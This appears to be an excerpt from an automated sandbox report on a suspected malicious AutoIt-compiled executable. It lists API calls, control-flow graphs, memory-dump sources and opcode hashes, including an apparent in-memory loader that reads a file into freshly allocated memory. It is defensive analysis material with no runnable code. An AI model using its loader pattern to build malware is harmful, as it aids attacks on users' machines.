                                          • _wcscpy.LIBCMT ref: 0040E487
                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                          • _wcscat.LIBCMT ref: 00427541
                                          • _wcslen.LIBCMT ref: 00427551
                                          • _wcslen.LIBCMT ref: 00427562
                                          • _wcscat.LIBCMT ref: 0042757C
                                          • _wcsncpy.LIBCMT ref: 004275BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                          • String ID: Include$\
                                          • API String ID: 3173733714-3429789819
                                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                          Control-flow Graph

                                          APIs
                                          • _fseek.LIBCMT ref: 0045292B
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                          • __fread_nolock.LIBCMT ref: 00452961
                                          • __fread_nolock.LIBCMT ref: 00452971
                                          • __fread_nolock.LIBCMT ref: 0045298A
                                          • __fread_nolock.LIBCMT ref: 004529A5
                                          • _fseek.LIBCMT ref: 004529BF
                                          • _malloc.LIBCMT ref: 004529CA
                                          • _malloc.LIBCMT ref: 004529D6
                                          • __fread_nolock.LIBCMT ref: 004529E7
                                          • _free.LIBCMT ref: 00452A17
                                          • _free.LIBCMT ref: 00452A20
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                          • String ID:
                                          • API String ID: 1255752989-0
                                          • Opcode ID: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                          • Opcode Fuzzy Hash: 3f43f4209565cf9930803292f55859f81113a3883ec0e7be7bac3bff720706a2
                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __fread_nolock$_fseek_wcscpy
                                          • String ID: FILE
                                          • API String ID: 3888824918-3121273764
                                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                          • ImageList_ReplaceIcon.COMCTL32(00A154F0,000000FF,00000000), ref: 00410552
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A154F0,000000FF,00000000), ref: 00410552
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _malloc
                                          • String ID: Default
                                          • API String ID: 1579825452-753088835
                                          • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                          • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1979 40f65b-40f65e 1975->1979 1980 425d1e-425d3e call 4150d1 call 414d04 1975->1980 1977 40f68e-40f68f 1976->1977 1978 40f69f-40f6ad 1976->1978 1977->1975 1982 40f6b4-40f6c2 1978->1982 1983 40f6af-40f6b2 1978->1983 1979->1969 1979->1972 1990 425d43-425d5f call 414d30 1980->1990 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1980 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                          • String ID: AU3!$EA06
                                          • API String ID: 1268643489-2658333250
                                          • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                          • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1997 401144-40114a 1995->1997 1998 40111b-40111e 1995->1998 1996->1995 1999 401182 1996->1999 2001 401184-40118e call 401250 1997->2001 2002 40114c-40114f 1997->2002 1998->1997 2000 401120-401126 1998->2000 2003 40112c-401141 DefWindowProcW 1999->2003 2000->2003 2005 42b038-42b03f 2000->2005 2008 401193-40119a 2001->2008 2006 401151-401157 2002->2006 2007 40119d 2002->2007 2005->2003 2013 42b045-42b059 call 401000 call 40e0c0 2005->2013 2011 401219-40121f 2006->2011 2012 40115d 2006->2012 2009 4011a3-4011a9 2007->2009 2010 42afb4-42afc5 call 40f190 2007->2010 2009->2000 2014 4011af 2009->2014 2010->2008 2011->2000 2017 401225-42b06d call 468b0e 2011->2017 2015 401163-401166 2012->2015 2016 42b01d-42b024 2012->2016 2013->2003 2014->2000 2020 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2014->2020 2021 4011db-401202 SetTimer RegisterWindowMessageW 2014->2021 2023 42afe9-42b018 call 40f190 call 401a50 2015->2023 2024 40116c-401172 2015->2024 2016->2003 2022 42b02a-42b033 call 4370f4 2016->2022 2017->2008 2021->2008 2032 401204-401216 CreatePopupMenu 2021->2032 2022->2003 2023->2003 2024->2000 2034 401174-42afde call 45fd57 2024->2034 2034->2003 2045 42afe4 2034->2045 2045->2008
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                          • CreatePopupMenu.USER32 ref: 00401204
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                          • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                          APIs
                                          • _malloc.LIBCMT ref: 004115F1
                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                          • std::exception::exception.LIBCMT ref: 00411626
                                          • std::exception::exception.LIBCMT ref: 00411640
                                          • __CxxThrowException@8.LIBCMT ref: 00411651
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                          • String ID: ,*H$4*H$@fI
                                          • API String ID: 615853336-1459471987
                                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2065 3e82628-3e826d6 call 3e80048 2068 3e826dd-3e82703 call 3e83538 CreateFileW 2065->2068 2071 3e8270a-3e8271a 2068->2071 2072 3e82705 2068->2072 2080 3e8271c 2071->2080 2081 3e82721-3e8273b VirtualAlloc 2071->2081 2073 3e82855-3e82859 2072->2073 2074 3e8289b-3e8289e 2073->2074 2075 3e8285b-3e8285f 2073->2075 2077 3e828a1-3e828a8 2074->2077 2078 3e8286b-3e8286f 2075->2078 2079 3e82861-3e82864 2075->2079 2082 3e828aa-3e828b5 2077->2082 2083 3e828fd-3e82912 2077->2083 2084 3e8287f-3e82883 2078->2084 2085 3e82871-3e8287b 2078->2085 2079->2078 2080->2073 2086 3e8273d 2081->2086 2087 3e82742-3e82759 ReadFile 2081->2087 2088 3e828b9-3e828c5 2082->2088 2089 3e828b7 2082->2089 2090 3e82922-3e8292a 2083->2090 2091 3e82914-3e8291f VirtualFree 2083->2091 2092 3e82893 2084->2092 2093 3e82885-3e8288f 2084->2093 2085->2084 2086->2073 2094 3e8275b 2087->2094 2095 3e82760-3e827a0 VirtualAlloc 2087->2095 2098 3e828d9-3e828e5 2088->2098 2099 3e828c7-3e828d7 2088->2099 2089->2083 2091->2090 2092->2074 2093->2092 2094->2073 2096 3e827a2 2095->2096 2097 3e827a7-3e827c2 call 3e83788 2095->2097 2096->2073 2105 3e827cd-3e827d7 2097->2105 2102 3e828f2-3e828f8 2098->2102 2103 3e828e7-3e828f0 2098->2103 2101 3e828fb 2099->2101 2101->2077 2102->2101 2103->2101 2106 3e827d9-3e82808 call 3e83788 2105->2106 2107 3e8280a-3e8281e call 3e83598 2105->2107 2106->2105 2113 3e82820 2107->2113 2114 3e82822-3e82826 2107->2114 2113->2073 2115 3e82828-3e8282c CloseHandle 2114->2115 2116 3e82832-3e82836 2114->2116 2115->2116 2117 3e82838-3e82843 VirtualFree 2116->2117 2118 3e82846-3e8284f 2116->2118 2117->2118 2118->2068 2118->2073
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03E826F9
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03E8291F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1729394429.0000000003E80000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3e80000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                          • Instruction ID: 8273aaa26adaea98ac56f98112bcc5b7f1230e045443a769290408bc28e311cf
                                          • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                          • Instruction Fuzzy Hash: DEA11774E00208EBDF14DFA4C984BEEB7B5BF48304F249A99E619BB280D7759A41CF54

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2119 401250-40125c 2120 401262-401293 call 412f40 call 401b80 2119->2120 2121 4012e8-4012ed 2119->2121 2126 4012d1-4012e2 KillTimer SetTimer 2120->2126 2127 401295-4012b5 2120->2127 2126->2121 2128 4012bb-4012bf 2127->2128 2129 4272ec-4272f2 2127->2129 2132 4012c5-4012cb 2128->2132 2133 42733f-427346 2128->2133 2130 4272f4-427315 Shell_NotifyIconW 2129->2130 2131 42731a-42733a Shell_NotifyIconW 2129->2131 2130->2126 2131->2126 2132->2126 2134 427393-4273b4 Shell_NotifyIconW 2132->2134 2135 427348-427369 Shell_NotifyIconW 2133->2135 2136 42736e-42738e Shell_NotifyIconW 2133->2136 2134->2126 2135->2126 2136->2126
                                          APIs
                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 3300667738-0
                                          • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                          • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
